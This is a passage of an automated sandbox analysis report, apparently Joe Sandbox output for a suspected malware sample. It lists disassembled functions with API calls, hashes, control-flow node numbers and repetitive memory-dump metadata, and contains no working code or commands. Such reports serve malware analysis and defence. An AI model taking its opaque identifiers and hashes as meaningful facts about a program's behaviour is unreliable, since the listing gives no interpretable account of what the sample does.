                                                                                                                                                                                                                                                  • Part of subcall function 00AAB7B0: FreeLibrary.KERNEL32 ref: 00AAB7D7
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FreeLibrary$ExitProcess
                                                                                                                                                                                                                                                • String ID: b]u)$}$}
                                                                                                                                                                                                                                                • API String ID: 1614911148-2900034282
                                                                                                                                                                                                                                                • Opcode ID: 52f366490bfb280876f0dc235de97f0b039fccd1aa2a6f587b08331c926430e3
                                                                                                                                                                                                                                                • Instruction ID: 86013a5fd7edda54c6142d7dba0ca668d10fb3f05c31c6ca0ab89b6867408e80
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 52f366490bfb280876f0dc235de97f0b039fccd1aa2a6f587b08331c926430e3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 46C1F673E187144BC718DF69C84125AF7D6ABC8710F0EC52EA898EB395EA74DD058BC2
                                                                                                                                                                                                                                                Function 00ACD34A Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 398COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 1337 acd34a-acd362 1338 acd370-acd382 1337->1338 1338->1338 1339 acd384-acd389 1338->1339 1340 acd39b-acd3a7 1339->1340 1341 acd38b-acd38f 1339->1341 1343 acd3a9-acd3ab 1340->1343 1344 acd3c1-acd40f call adfe00 GetPhysicallyInstalledSystemMemory 1340->1344 1342 acd390-acd399 1341->1342 1342->1340 1342->1342 1345 acd3b0-acd3bd 1343->1345 1349 acd410-acd44d 1344->1349 1345->1345 1347 acd3bf 1345->1347 1347->1344 1349->1349 1350 acd44f-acd498 call abe960 1349->1350 1353 acd4a0-acd551 1350->1353 1353->1353 1354 acd557-acd55c 1353->1354 1355 acd57d-acd583 1354->1355 1356 acd55e-acd568 1354->1356 1358 acd586-acd58e 1355->1358 1357 acd570-acd579 1356->1357 1357->1357 1361 acd57b 1357->1361 1359 acd5ab-acd5b3 1358->1359 1360 acd590-acd591 1358->1360 1363 acd5cb-acd611 1359->1363 1364 acd5b5-acd5b6 1359->1364 1362 acd5a0-acd5a9 1360->1362 1361->1358 1362->1359 1362->1362 1366 acd620-acd653 1363->1366 1365 acd5c0-acd5c9 1364->1365 1365->1363 1365->1365 1366->1366 1367 acd655-acd65a 1366->1367 1368 acd65c-acd65d 1367->1368 1369 acd66d 1367->1369 1370 acd660-acd669 1368->1370 1371 acd670-acd67a 1369->1371 1370->1370 1372 acd66b 1370->1372 1373 acd67c-acd67f 1371->1373 1374 acd68b-acd73c 1371->1374 1372->1371 1375 acd680-acd689 1373->1375 1375->1374 1375->1375
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 00ACD3EE
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InstalledMemoryPhysicallySystem
                                                                                                                                                                                                                                                • String ID: ><+
                                                                                                                                                                                                                                                • API String ID: 3960555810-2918635699
                                                                                                                                                                                                                                                • Opcode ID: 5256b016b524df1da96410ea0bef449698c52475e1d8ab2ebcd0a1c626d9c2fc
                                                                                                                                                                                                                                                • Instruction ID: 85e6fb1af9cf376d0c35aafeb0da9a935954c652ae3964f1b08de0a977b08349
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5256b016b524df1da96410ea0bef449698c52475e1d8ab2ebcd0a1c626d9c2fc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 52C1C4756047818FD725CF2AC490762FBE2BF9A310F2985ADC4DA9B752C739E806CB50
                                                                                                                                                                                                                                                Function 00AE0D20 Relevance: 2.9, Strings: 2, Instructions: 425COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID: @Ukx$
                                                                                                                                                                                                                                                • API String ID: 2994545307-3636270652
                                                                                                                                                                                                                                                • Opcode ID: 3ef713432d351eb6be88789cc536e71dd97f0185de03404efe0641fd421f8b7d
                                                                                                                                                                                                                                                • Instruction ID: 17ccf2a4d2a53eb98b48341274768b9c3c441ca93ea9487448a0470b65e50262
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3ef713432d351eb6be88789cc536e71dd97f0185de03404efe0641fd421f8b7d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 99B17732B083904BC728CE69DCE16BBB7A2EBC5314F1DC63CD9865B385CA759C458781
                                                                                                                                                                                                                                                Function 00AAE687 Relevance: 1.6, Strings: 1, Instructions: 340COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: D723E1129B685441BEBA0C6A975F1733
                                                                                                                                                                                                                                                • API String ID: 0-4137089617
                                                                                                                                                                                                                                                • Opcode ID: b6fd817d0db9f6a84c865f8b4154423fe2d5ce12d66927e698549f1f03004add
                                                                                                                                                                                                                                                • Instruction ID: fcd0b59b3c1661c63bd0bcb60ac30d28004c08f677fc0674fce7ab80db1f7d07
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b6fd817d0db9f6a84c865f8b4154423fe2d5ce12d66927e698549f1f03004add
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 908129756407418BD325CB38CD926A7B7E2FF9B315F19CA6CC4865B383E739A8028750
                                                                                                                                                                                                                                                Function 00ADE110 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LdrInitializeThunk.NTDLL(00AE148A,?,00000018,?,?,00000018,?,?,?), ref: 00ADE13E
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                                                                                                                                Function 00AC7440 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID: _^]\
                                                                                                                                                                                                                                                • API String ID: 2994545307-3116432788
                                                                                                                                                                                                                                                • Opcode ID: dc4c9a4cede90193039f3836874e890e17c3a841bb6f5194293cc75cc6666d5a
                                                                                                                                                                                                                                                • Instruction ID: d4bfd86356a78c5c3d5b2119f71bddca41de9919d5eff43aee1e9a860728d08d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dc4c9a4cede90193039f3836874e890e17c3a841bb6f5194293cc75cc6666d5a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E77119B5A083005BDB289B68DCD2F7F76E1DF92314F1A853CE4868B292E274DC058B56
                                                                                                                                                                                                                                                Function 00AE1720 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID: =<32
                                                                                                                                                                                                                                                • API String ID: 2994545307-852023076
                                                                                                                                                                                                                                                • Opcode ID: 455dad8c37ae2cdc1af5dcfe6ab487bec2669b3589ff987dc1a11bde1d364a01
                                                                                                                                                                                                                                                • Instruction ID: 78f82a83d013dbca52f53540f13e8dcfe957f60ea280f3cc2593610870163ec2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 455dad8c37ae2cdc1af5dcfe6ab487bec2669b3589ff987dc1a11bde1d364a01
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 24314638708394ABE714DB55DCE1B3FB7A6EB95750F18852CF6859B2A0D770EC408B82
                                                                                                                                                                                                                                                Function 00AC1A10 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: ,-
                                                                                                                                                                                                                                                • API String ID: 0-1027024164
                                                                                                                                                                                                                                                • Opcode ID: 06cf73e96cbd3b5690f2ca20f4169135739bb2cbdda87b2e837e8d4cd73f2704
                                                                                                                                                                                                                                                • Instruction ID: 0ed83c1ee5481d759adb021225f0da9b9db28ae178e02a48062e4885e0ce7910
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 06cf73e96cbd3b5690f2ca20f4169135739bb2cbdda87b2e837e8d4cd73f2704
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC21D6A1A153008BC7149F29CD92A27B6B1EF833A5F46861CE4968B392F774CD05C792
                                                                                                                                                                                                                                                Function 00AE0340 Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349805419.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350002702.0000000000F28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2350025436.0000000000F29000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                                                • API String ID: 2994545307-2766056989
                                                                                                                                                                                                                                                • Opcode ID: 11df37a858b7e14e7ffe233c2ec2c75207786d38d896addf74f7f351ad0cd8a9
                                                                                                                                                                                                                                                • Instruction ID: 6695fd0f4aa9336d6c77f3899f7fb55c625fb519870f35184d068c8a0a0a55f9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 11df37a858b7e14e7ffe233c2ec2c75207786d38d896addf74f7f351ad0cd8a9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F73122716083448BC314DF58D8D2A7FBBF4EBC5324F14892CE69987290D375D888CB92
                                                                                                                                                                                                                                                Function 00AE0460 Relevance: .2, Instructions: 250COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349187170.0000000000AA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349207289.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349320463.0000000000AF3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2349404536.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
